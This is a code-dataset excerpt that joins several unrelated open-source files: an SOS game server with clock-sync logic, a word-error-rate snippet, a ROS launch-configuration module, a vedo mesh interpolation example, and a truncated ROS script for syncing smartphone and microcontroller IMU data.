directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]]
with self.lock:
self.game.board[coordinate_x][coordinate_y] = character
for x in range(coordinate_x - 1, coordinate_x + 2):
for y in range(coordinate_y - 1, coordinate_y + 2):
for direction in directions:
sequence = ""
sequence_coordinates = []
for i in range(3):
sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1) * direction[1]])
if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \
sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col:
sequence = "NOO"
break
sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]]
if sequence == "SOS" and sequence_coordinates not in self.game.complete_lines:
self.game.scores[id] += 1
self.game.complete_lines.append(sequence_coordinates)
for coordinate in sequence_coordinates:
self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1])
def move(self, id, move):
with self.lock:
if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received:
return
coordinate_x, coordinate_y, character = move
self.calculate_score(id, coordinate_x, coordinate_y, character)
self.generate_question()
self.notify_players()
def give_turn(self, id, question_uuid, duration):
print(f"Player {id} duration: {duration} seconds")
with self.lock:
if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid:
return
self.answer_ts[id] = duration
if self.answer_ts[1 - id]:
return
if not self.answer_ts[1 - id]:
time.sleep(abs(2 * self.ping_difference))
with self.lock:
self.game.state = GameState.MOVE
if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]:
self.game.turn = 1 - id
else:
self.game.turn = id
self.notify_players()
# Returns the normalized timestamp difference between acknowledgment of two players in seconds.
def get_timestamp_diff(self):
return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference)
def check_question_ack(self, id, client_rec, client_send, uuid):
self.ts_info[id][uuid]["server_rec"] = time.time()
self.ts_info[id][uuid]["client_rec"] = client_rec
self.ts_info[id][uuid]["client_send"] = client_send
with self.lock:
if self.game.state != GameState.QUESTION:
return
if self.game.question_uuid == uuid:
self.receive_question_ts[id] = client_rec
if self.receive_question_ts[1 - id]:
if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:
print("Both player has received the question " + uuid)
self.both_players_received = True
return
else:
return
else:
return
time.sleep(0.2)
with self.lock:
if self.game.question_uuid != uuid:
return
if self.receive_question_ts[1 - id]:
if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:
self.both_players_received = True
print("Both player has received the question " + uuid)
self.add_new_calibration_ts(uuid)
return
else:
self.add_new_calibration_ts(uuid)
self.generate_question()
self.notify_players()
def add_new_calibration_ts(self, uuid):
self.calibrations[0].append(self.ts_info[0][uuid])
self.calibrations[0] = self.calibrations[0][1:]
self.calibrations[1].append(self.ts_info[1][uuid])
self.calibrations[1] = self.calibrations[1][1:]
self.update_time_difference()
def update_time_difference(self):
ping0 = sum([(c["client_rec"]-c["server_send"]-c["client_send"]+c["server_rec"]) / 2 for c in self.calibrations[0][-6:]]) / 6
ping1 = sum([(c["client_rec"]-c["server_send"]-c["client_send"]+c["server_rec"]) / 2 for c in self.calibrations[1][-6:]]) / 6
print("Player 0 has a ping: ", ping0 * 1000, " ms")
print("Player 1 has a ping: ", ping1 * 1000, " ms")
self.ping_difference = ping0 - ping1
self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)]
delta0 = sum([(c["client_rec"]-c["server_send"]+c["client_send"]-c["server_rec"]) / 2 for c in self.calibrations[0][-6:]]) / 6
delta1 = sum([(c["client_rec"]-c["server_send"]+c["client_send"]-c["server_rec"]) / 2 for c in self.calibrations[1][-6:]]) / 6
self.ts_difference = delta0 - delta1
print("Calculated time difference in seconds is: ", self.ts_difference)
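    # Added note on the sync math above: with server send/receive stamps S0/S1
    # and client receive/send stamps C0/C1 for one calibration message, the
    # one-way ping estimate is ((C0 - S0) + (S1 - C1)) / 2 and the client clock
    # offset is ((C0 - S0) - (S1 - C1)) / 2 (the classic NTP formulas); the code
    # averages each over the last six samples before differencing the two
    # players into ping_difference and ts_difference.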
def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id):
self.calibrations[id][ack_id]["server_rec"] = time.time()
self.calibrations[id][ack_id]["client_rec"] = client_rec_ts
self.calibrations[id][ack_id]["client_send"] = client_send_ts
ready_to_start = False
with self.lock:
self.received_acks_cnt[id] += 1
if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10:
self.update_time_difference()
ready_to_start = True
if ready_to_start:
self.generate_question()
self.notify_players()
| 2.640625 | 3 |
5. Word error rate.py | srijoni68566/Dataset-preparation-for-training-deep-speech2-model-and-making-speech-to-text-conversion-system | 0 | 12794309 | from jiwer import wer
ground_truth = "কুমিল্লার খাদি সারা দেশে পরিচিত"
hypothesis = "কুমিল্লার খাদে সারা দেশে পরিচিত"
error = wer(ground_truth, hypothesis)
error
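# Added note: jiwer computes (substitutions + deletions + insertions) / number
# of reference words over whitespace tokens, so with one substituted word out
# of five ("খাদি" -> "খাদে") this should evaluate to 0.2.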
| 1.65625 | 2 |
default_cfg_fkie/src/default_cfg_fkie/default_cfg.py | Ryangupta8/multimaster_fkie | 0 | 12794310 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
from multimaster_msgs_fkie.msg import Capability
from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch
from rosgraph.rosenv import ROS_NAMESPACE
from roslaunch import ROSLaunchConfig, XmlLoader
import os
import rosgraph.masterapi
import rosgraph.names
import roslib.names
import roslib.network
import rospy
import shlex
import std_srvs.srv
import subprocess
import sys
import threading
from .screen_handler import ScreenHandler # , ScreenHandlerException
class LoadException(Exception):
    ''' The exception raised while searching for the given launch file. '''
pass
class StartException(Exception):
    ''' The exception raised while running a node contained in the loaded configuration. '''
pass
class DefaultCfg(object):
def __init__(self):
self.nodes = []
'''@ivar: the list with names of nodes with name spaces.'''
self.sensors = {}
'''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}'''
self.robot_descr = ('', '', '')
'''@ivar: robot description as tupel of (type, name, text) '''
self.package = ''
self.file = ''
self.__lock = threading.RLock()
# Load parameter
self.launch_file = rospy.get_param('~launch_file', '')
rospy.loginfo("launch_file: %s" % self.launch_file)
self.package = rospy.get_param('~package', '')
rospy.loginfo("package: %s" % self.package)
self.do_autostart = rospy.get_param('~autostart', False)
rospy.loginfo("do_autostart: %s" % self.do_autostart)
self.load_params_at_start = rospy.get_param('~load_params_at_start', True)
self.parameter_loaded = False
rospy.loginfo("load_params_at_start: %s" % self.load_params_at_start)
self.argv = rospy.get_param('~argv', [])
rospy.loginfo("argv: %s" % self.argv)
if not isinstance(self.argv, list):
self.argv = ["%s" % self.argv]
sys.argv.extend(self.argv)
if self.do_autostart:
rospy.set_param('~autostart', False)
# initialize the ROS services
# rospy.Service('~load', LoadLaunch, self.rosservice_load_launch)
self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload)
rospy.Service('~description', ListDescription, self.rosservice_description)
self.runService = None
'''@ivar: The service will be created on each load of a launch file to
inform the caller about a new configuration. '''
self.listService = None
'''@ivar: The service will be created on each load of a launch file to
inform the caller about a new configuration. '''
self.description_response = ListDescriptionResponse()
# variables to print the pending autostart nodes
self._pending_starts = set()
self._pending_starts_last_printed = set()
def _filter_args(self, argv):
afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:=']
result = []
for a in argv:
in_filter = False
for f in afilter:
if a.startswith(f):
in_filter = True
break
if ':=' not in a or in_filter:
continue
result.append(a)
return result
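    # Added example: _filter_args(['__ns:=/robot', 'use_sim_time:=true', 'foo'])
    # returns ['use_sim_time:=true'] - only ':='-style arguments that are not
    # internal remappings (__ns, __name, _package, _launch_file) are kept.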
def load(self, delay_service_creation=0.):
'''
Load the launch file configuration
'''
with self.__lock:
self._pending_starts.clear()
# shutdown the services to inform the caller about a new configuration.
if self.runService is not None:
self.runService.shutdown('reload config')
self.runService = None
if self.listService is not None:
self.listService.shutdown('reload config')
self.listService = None
self.nodes = [] # the name of nodes with namespace
self.sensors = {} # sensor descriptions
launch_path = self.getPath(self.launch_file, self.package)
rospy.loginfo("loading launch file: %s", launch_path)
self.masteruri = self._masteruri_from_ros()
self.roscfg = ROSLaunchConfig()
loader = XmlLoader()
argv = self._filter_args(sys.argv)
# remove namespace from sys.argv to avoid load the launchfile info local namespace
sys.argv = list(argv)
# set the global environment to empty namespace
os.environ[ROS_NAMESPACE] = rospy.names.SEP
rospy.set_param('~argv_used', list(set(argv)))
loader.load(launch_path, self.roscfg, verbose=False, argv=argv)
# create the list with node names
for item in self.roscfg.nodes:
if item.machine_name and not item.machine_name == 'localhost':
machine = self.roscfg.machines[item.machine_name]
if roslib.network.is_local_address(machine.address):
self.nodes.append(roslib.names.ns_join(item.namespace, item.name))
else:
self.nodes.append(roslib.names.ns_join(item.namespace, item.name))
# get the robot description
self.description_response = dr = ListDescriptionResponse()
dr.robot_name = ''
dr.robot_type = ''
dr.robot_descr = ''
for param, p in self.roscfg.params.items():
if param.endswith('robots'):
if isinstance(p.value, list):
if len(p.value) > 0 and len(p.value[0]) != 5:
print("WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore", param)
else:
for entry in p.value:
try:
print(entry[0], rospy.get_param('/mastername', ''))
if not entry[0] or entry[0] == rospy.get_param('/mastername', ''):
dr.robot_name = self._decode(entry[2])
dr.robot_type = entry[1]
dr.robot_images = entry[3].split(',')
dr.robot_descr = self._decode(entry[4])
break
except:
pass
# get the sensor description
tmp_cap_dict = self.getCapabilitiesDesrc()
for machine, ns_dict in tmp_cap_dict.items():
if machine in self.roscfg.machines:
machine = self.roscfg.machines[machine].address
if not machine or roslib.network.is_local_address(machine):
for ns, group_dict in ns_dict.items():
for group, descr_dict in group_dict.items():
if descr_dict['nodes']:
cap = Capability()
cap.namespace = ns
cap.name = group
cap.type = descr_dict['type']
cap.images = list(descr_dict['images'])
cap.description = descr_dict['description']
cap.nodes = list(descr_dict['nodes'])
dr.capabilities.append(cap)
# load parameters into the ROS parameter server
if self.load_params_at_start:
self.loadParams()
# initialize the ROS services
            # HACK to let the node_manager update the view
if delay_service_creation > 0.:
t = threading.Timer(delay_service_creation, self._timed_service_creation)
t.start()
else:
self._timed_service_creation()
# self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True)
# if self.nodes:
# self.runService = rospy.Service('~run', Task, self.rosservice_start_node)
# self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)
# except:
# import traceback
# print traceback.format_exc()
if self.do_autostart:
if not self.parameter_loaded:
self.loadParams()
for n in self.nodes:
try:
self.runNode(n, self.do_autostart)
except Exception as e:
rospy.logwarn("Error while start %s: %s", n, e)
self.do_autostart = False
def _decode(self, val):
'''
        Replaces '\\n' by LF (Line Feed) and decodes the string entry from the system
        default encoding to unicode.
        @param val: the string coded in the system default encoding
@type val: str
@return: the decoded string
@rtype: C{unicode} or original on error
'''
result = val.replace("\\n ", "\n")
try:
result = result.decode(sys.getfilesystemencoding())
except:
pass
return result
def getCapabilitiesDesrc(self):
'''
        Parses the launch file for the C{capabilities} and C{capability_group} parameters
        and creates a dictionary for grouping the nodes.
@return: the capabilities description stored in this configuration
@rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))}
'''
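        # Illustrative example only (parameter layout assumed from the format checks below):
        #   capabilities = [['navigation', 'nav', 'nav.png,map.png', 'Move base and planners']]
        #   <node>/capability_group = 'navigation'
        # would group that node under the 'navigation' capability in the returned dictionary.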
result = dict()
capabilies_descr = dict()
if self.roscfg is not None:
# get the capabilities description
# use two separate loops, to create the description list first
for param, p in self.roscfg.params.items():
if param.endswith('capabilities'):
if isinstance(p.value, list):
if len(p.value) > 0 and len(p.value[0]) != 4:
print("WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore", param)
else:
for entry in p.value:
capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])}
# get the capability nodes
for item in self.roscfg.nodes:
node_fullname = roslib.names.ns_join(item.namespace, item.name)
machine_name = item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else ''
added = False
cap_param = roslib.names.ns_join(node_fullname, 'capability_group')
cap_ns = node_fullname
# find the capability group parameter in namespace
while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1:
cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP)
if not cap_ns:
cap_ns = roslib.names.SEP
cap_param = roslib.names.ns_join(cap_ns, 'capability_group')
if cap_ns == node_fullname:
                    cap_ns = item.namespace.rstrip(roslib.names.SEP)
if not cap_ns:
cap_ns = roslib.names.SEP
# if the 'capability_group' parameter found, assign node to the group
if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value:
p = self.roscfg.params[cap_param]
if machine_name not in result:
result[machine_name] = dict()
for (ns, groups) in result[machine_name].items():
if ns == cap_ns and p.value in groups:
groups[p.value]['nodes'].append(node_fullname)
added = True
break
if not added:
ns = cap_ns
# add new group in the namespace of the node
if ns not in result[machine_name]:
result[machine_name][ns] = dict()
if p.value not in result[machine_name][ns]:
try:
result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'],
'images': capabilies_descr[p.value]['images'],
'description': capabilies_descr[p.value]['description'],
'nodes': []}
except:
result[machine_name][ns][p.value] = {'type': '',
'images': [],
'description': '',
'nodes': []}
result[machine_name][ns][p.value]['nodes'].append(node_fullname)
return result
def _masteruri_from_ros(self):
'''
Returns the master URI depending on ROS distribution API.
@return: ROS master URI
@rtype: C{str}
'''
try:
import rospkg.distro
distro = rospkg.distro.current_distro_codename()
if distro in ['electric', 'diamondback', 'cturtle']:
return roslib.rosenv.get_master_uri()
else:
return rosgraph.rosenv.get_master_uri()
except:
return roslib.rosenv.get_master_uri()
def _timed_service_creation(self):
with self.__lock:
try:
if self.runService is None:
self.runService = rospy.Service('~run', Task, self.rosservice_start_node)
if self.listService is None:
self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)
except:
import traceback
print(traceback.format_exc())
def getPath(self, path, package=''):
'''
        Searches for a launch file. If package is given, try first to find the launch
        file in the given package. If more than one launch file with the same name is
        found in the package, the first one will be taken.
@param path: the file name of the launch file
@type path: C{str}
@param package: the package containing the launch file or an empty string,
if the C{file} is an absolute path
@type package: C{str}
@return: the absolute path of the launch file
@rtype: C{str}
@raise LoadException: if the given file is not found
'''
launch_file = path
# if package is set, try to find the launch file in the given package
if package:
paths = roslib.packages.find_resource(package, launch_file)
if len(paths) > 0:
                # if more than one launch file is found, take the first one
launch_file = paths[0]
if os.path.isfile(launch_file) and os.path.exists(launch_file):
return launch_file
raise LoadException('File %s in package [%s] not found!' % (path, package))
def rosservice_list_nodes(self, req):
'''
Callback for the ROS service to get the list with available nodes.
'''
return ListNodesResponse(self.nodes)
def rosservice_start_node(self, req):
'''
Callback for the ROS service to start a node.
'''
self.runNode(req.node)
return []
def rosservice_reload(self, req):
self.load(2.)
return []
# def rosservice_load_launch(self, req):
# '''
# Load the launch file
# '''
# try:
# self.__lock.acquire()
# self.load(req.package, req.file, req.argv)
# finally:
# self.__lock.release()
# return []
def rosservice_description(self, req):
'''
Returns the current description.
'''
return self.description_response
def loadParams(self):
'''
Loads all parameter into ROS parameter server.
'''
params = dict()
for param, value in self.roscfg.params.items():
params[param] = value
# rospy.loginfo("register PARAMS:\n%s", '\n'.join(params))
self._load_parameters(self.masteruri, params, self.roscfg.clear_params)
self.parameter_loaded = True
def runNode(self, node, autostart=False):
'''
Start the node with given name from the currently loaded configuration.
@param node: the name of the node
@type node: C{str}
        @raise StartException: if an error occurred while starting the node.
'''
if not self.parameter_loaded:
self.loadParams()
n = None
for item in self.roscfg.nodes:
itemname = rospy.names.ns_join(item.namespace, item.name)
if itemname == node:
n = item
break
if n is None:
raise StartException("Node '%s' not found!" % node)
if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)):
# skip autostart
rospy.loginfo("%s is in exclude list, skip autostart", n.name)
return
# env = n.env_args
prefix = n.launch_prefix if n.launch_prefix is not None else ''
args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name]
if not (n.cwd is None):
args.append('__cwd:=%s' % n.cwd)
# add remaps
for remap in n.remap_args:
args.append('%s:=%s' % (remap[0], remap[1]))
# masteruri = self.masteruri
# if n.machine_name and not n.machine_name == 'localhost':
# machine = self.roscfg.machines[n.machine_name]
# TODO: env-loader support?
# if machine.env_args:
# env[len(env):] = machine.env_args
# nm.screen().testScreen()
cmd = self._get_node(n.package, n.type)
# determine the current working path, Default: the package of the node
cwd = self.get_ros_home()
if not (n.cwd is None):
if n.cwd == 'ROS_HOME':
cwd = self.get_ros_home()
elif n.cwd == 'node':
cwd = os.path.dirname(cmd[0])
respawn = ['']
if n.respawn:
respawn = self._get_node('node_manager_fkie', 'respawn')
# set the respawn environment variables
respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name))
if respawn_params['max'] > 0:
n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max']))
if respawn_params['min_runtime'] > 0:
n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime']))
if respawn_params['delay'] > 0:
n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay']))
node_cmd = [respawn[0], prefix, cmd[0]]
cmd_args = [ScreenHandler.getSceenCmd(node)]
cmd_args[len(cmd_args):] = node_cmd
cmd_args.append(n.args)
cmd_args[len(cmd_args):] = args
# print 'runNode: ', cmd_args
popen_cmd = shlex.split(str(' '.join(cmd_args)))
rospy.loginfo("run node '%s as': %s", node, str(' '.join(popen_cmd)))
# remove the 'BASH_ENV' and 'ENV' from environment
new_env = dict(os.environ)
try:
for k in ['BASH_ENV', 'ENV']:
del new_env[k]
except:
pass
# add node environment parameter
for k, v in n.env_args:
new_env[k] = v
# the ROS_NAMESPACE environment is used in cpp plugins in rqt
if n.namespace:
new_env['ROS_NAMESPACE'] = n.namespace
# set delayed autostart parameter
self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart)
if len(cmd) > 1:
            raise StartException('Multiple executables were found! The first one was started! Executables:\n%s' % str(cmd))
def _run_node(self, cmd, cwd, env, node, autostart=False):
self._pending_starts.add(node)
start_now = True
start_delay = self._get_start_delay(node)
start_required = self._get_start_required(node)
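        # Autostart flow: if a 'required publisher' topic is configured and not yet
        # published, re-check the ROS master every 3 seconds before starting the node;
        # once it is available, an optional per-node start delay is applied before the
        # process is actually spawned.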
if autostart and start_required:
start_now = False
# get published topics from ROS master
master = rosgraph.masterapi.Master(self.masteruri)
for topic, datatype in master.getPublishedTopics(''):
if start_required == topic:
start_now = True
break
if not start_now:
# Start the timer for waiting for the topic
start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart))
start_timer.start()
if start_now and autostart and start_delay > 0:
start_now = False
# start timer for delayed start
start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False))
start_timer.start()
if start_now:
ps = subprocess.Popen(cmd, cwd=cwd, env=env)
# wait for process to avoid 'defunct' processes
thread = threading.Thread(target=ps.wait)
thread.setDaemon(True)
thread.start()
# remove from pending autostarts
try:
self._pending_starts.remove(node)
except:
pass
# print the current pending autostarts
if self._pending_starts_last_printed != self._pending_starts:
self._pending_starts_last_printed.clear()
self._pending_starts_last_printed.update(self._pending_starts)
rospy.loginfo("Pending autostarts %d: %s", len(self._pending_starts), self._pending_starts)
def _get_node(self, pkg, filename):
cmd = None
try:
cmd = roslib.packages.find_node(pkg, filename)
except roslib.packages.ROSPkgException as e:
# multiple nodes, invalid package
raise StartException(str(e))
except Exception as e:
raise StartException(str(e))
# handle different result types str or array of string
if sys.version_info[0] <= 2:
import types
string_types = types.StringTypes
else:
string_types = (str,)
if isinstance(cmd, string_types):
cmd = [cmd]
if cmd is None or len(cmd) == 0:
raise StartException('%s in package [%s] not found!' % (filename, pkg))
return cmd
def _get_start_exclude(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude')
try:
return bool(self.roscfg.params[param_name].value)
except:
pass
return False
def _get_start_delay(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay')
try:
return float(self.roscfg.params[param_name].value)
except:
pass
return 0.
def _get_start_required(self, node):
param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher')
topic = ''
try:
topic = self.roscfg.params[param_name].value
if rosgraph.names.is_private(topic):
                rospy.logwarn('Private topic `%s` for the autostart required publisher is ignored!' % topic)
topic = ''
elif not rosgraph.names.is_global(topic):
topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic)
except:
pass
return topic
def _get_respawn_params(self, node):
result = {'max': 0, 'min_runtime': 0, 'delay': 0}
respawn_max = rospy.names.ns_join(node, 'respawn/max')
respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime')
respawn_delay = rospy.names.ns_join(node, 'respawn/delay')
try:
result['max'] = int(self.roscfg.params[respawn_max].value)
except:
pass
try:
result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value)
except:
pass
try:
result['delay'] = int(self.roscfg.params[respawn_delay].value)
except:
pass
return result
def get_ros_home(self):
'''
Returns the ROS HOME path depending on ROS distribution API.
@return: ROS HOME path
@rtype: C{str}
'''
try:
import rospkg.distro
distro = rospkg.distro.current_distro_codename()
if distro in ['electric', 'diamondback', 'cturtle']:
import roslib.rosenv
return roslib.rosenv.get_ros_home()
else:
import rospkg
return rospkg.get_ros_home()
except:
import traceback
print(traceback.format_exc())
import roslib.rosenv
return roslib.rosenv.get_ros_home()
@classmethod
def _load_parameters(cls, masteruri, params, clear_params):
"""
Load parameters onto the parameter server
"""
try:
import xmlrpclib
except ImportError:
import xmlrpc.client as xmlrpclib
param_server = xmlrpclib.ServerProxy(masteruri)
p = None
try:
# multi-call style xmlrpc
param_server_multi = xmlrpclib.MultiCall(param_server)
# clear specified parameter namespaces
# #2468 unify clear params to prevent error
for p in clear_params:
param_server_multi.deleteParam(rospy.get_name(), p)
r = param_server_multi()
# for code, msg, _ in r:
# if code != 1:
# raise StartException("Failed to clear parameter: %s"%(msg))
# multi-call objects are not reusable
param_server_multi = xmlrpclib.MultiCall(param_server)
            for p in params.values():
# suppressing this as it causes too much spam
# printlog("setting parameter [%s]"%p.key)
param_server_multi.setParam(rospy.get_name(), p.key, p.value)
r = param_server_multi()
for code, msg, _ in r:
if code != 1:
raise StartException("Failed to set parameter: %s" % (msg))
except Exception:
raise # re-raise as this is fatal
| 1.070313 | 1 |
examples/advanced/interpolateScalar4.py | mikami520/vedo | 1 | 12794311 | <gh_stars>1-10
"""Interpolate cell values from a quad-mesh to a tri-mesh"""
from vedo import Grid, show
# Make up some quad mesh with associated scalars
g1 = Grid(res=(25,25)).wireframe(0).lw(1)
scalars = g1.points()[:,1]
g1.cmap("viridis", scalars, vmin=-1, vmax=1, name='gene')
g1.mapPointsToCells() # move the array to cells (faces)
g1.addScalarBar(horizontal=1, pos=(0.7,0.04))
g1.rotateZ(20) # let's rotate it a bit so it's visible
# Interpolate first mesh onto a new triangular mesh
eps = 0.01
g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0)
g2.triangulate()
# Interpolate by averaging the closest 3 points:
#g2.interpolateDataFrom(g1, on='cells', N=3)
# Interpolate by picking points in a specified radius,
# if there are no points in that radius set null value -1
g2.interpolateDataFrom(
g1,
on='cells',
radius=0.1+eps,
nullStrategy=1,
nullValue=-1,
)
g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar()
show(g1, g2, __doc__, axes=1)
| 2.46875 | 2 |
master.py | MobileRoboticsSkoltech/bandeja-wrapper | 0 | 12794312 | <reponame>MobileRoboticsSkoltech/bandeja-wrapper
import time
from src.RemoteControl import RemoteControl
from concurrent.futures import ThreadPoolExecutor
import subprocess
import rospy
from sensor_msgs.msg import Imu, CameraInfo, TimeReference
import numpy as np
import pandas as pd
from io import StringIO
from src.TimeSync import TimeSync2
import matplotlib as mpl
#mpl.use('TkAgg')
import matplotlib.pyplot as plt
import signal
import sys
import select
import os
HOST = None # The smartphone's IP address
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def print_master(string):
print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC)
def print_master_error(string):
print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC)
subpr_list = []
mcu_imu_time = []
mcu_imu_data = []
depth_cam_ts = None
mcu_cam_ts = None
mcu_cam_ts_common = None
remote = None
def mcu_imu_callback(data):
dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9
mcu_imu_time.append(dat)
dat = data.angular_velocity
mcu_imu_data.append([dat.x, dat.y, dat.z])
def depth_cam_callback(data):
if data.header.seq == 1:
global depth_cam_ts
depth_cam_ts = data.header.stamp
def mcu_cam_callback(data):
if data.header.seq == 12:
global mcu_cam_ts
mcu_cam_ts = data.header.stamp
global mcu_cam_ts_common
mcu_cam_ts_common = data.header.stamp
def main(args):
if len(args) == 1:
        print 'Please provide the smartphone IP address. For instance, 10.30.65.166'
sys.exit()
global HOST
HOST = args[1]
# Register SIGINT handler
def signal_handler(sig, frame):
print_master('Exiting')
running_subpr_list = []
for subpr in subpr_list:
if subpr is not None:
subpr.terminate()
running_subpr_list.append(subpr)
exit_codes = [p.wait() for p in running_subpr_list]
if remote is not None:
try:
remote.stop_video()
except:
pass
remote.close()
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
# Starting smartphone remote control
global remote
remote = RemoteControl(HOST)
# Launching ROS data collection nodes
launch_subprocess = subprocess.Popen("roslaunch data_collection data_collection_ns.launch".split())
subpr_list.append(launch_subprocess)
# Wait until .launch launched completely
time.sleep(2)
while True:
print_master('Tap Enter to start Twist-n-Sync alignment process')
input = select.select([sys.stdin], [], [], 2)[0]
if input:
value = sys.stdin.readline().rstrip()
if (value == ""):
break
rospy.init_node('master', anonymous=True)
# 1. Twist-n-Sync
start_duration = 1
main_duration = 4
end_duration = 4
# Wait to avoid shaking
time.sleep(1)
# Gathering MCU and smartphone IMU data
with ThreadPoolExecutor(max_workers=1) as executor:
print_master('IMUs gathering started. Wait, please')
future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False)
#mcu_imu_listener()
mcu_imu_listener = rospy.Subscriber("mcu_imu", Imu, mcu_imu_callback)
time.sleep(start_duration)
print_master('Start shaking')
time.sleep(main_duration)
print_master('Put back')
time.sleep(end_duration)
#rospy.signal_shutdown('it is enough')
mcu_imu_listener.unregister()
print_master('AAA')
_, sm_ascii_gyro_data, _ = future.result()
print_master('IMUs gathering finished')
# Get data from mcu imu
mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition
mcu_gyro_time = np.asarray(mcu_imu_time)
#print(gyro_data[:200]) # Show the problem of the first measurement
# Get data from s10 imu
sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False)
sm_gyro_data = sm_df.iloc[1:, :3].to_numpy()
sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9
# Equalize lengths
min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0])
mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \
mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \
sm_gyro_data[:min_length], sm_gyro_time[:min_length]
# Obtain offset
time_sync2 = TimeSync2(
mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False
)
time_sync2.resample(accuracy=1)
time_sync2.obtain_delay()
